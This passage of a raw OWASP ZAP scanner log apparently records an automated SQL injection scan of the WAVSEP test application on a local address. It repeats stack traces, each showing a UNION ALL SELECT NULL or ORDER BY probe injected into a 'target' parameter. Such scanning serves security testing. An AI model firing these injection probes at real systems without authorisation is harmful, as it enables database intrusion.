org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682185 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682186 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682187 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682188 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682188 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682189 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682190 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682192 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682193 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682194 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682195 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682195 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682196 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown 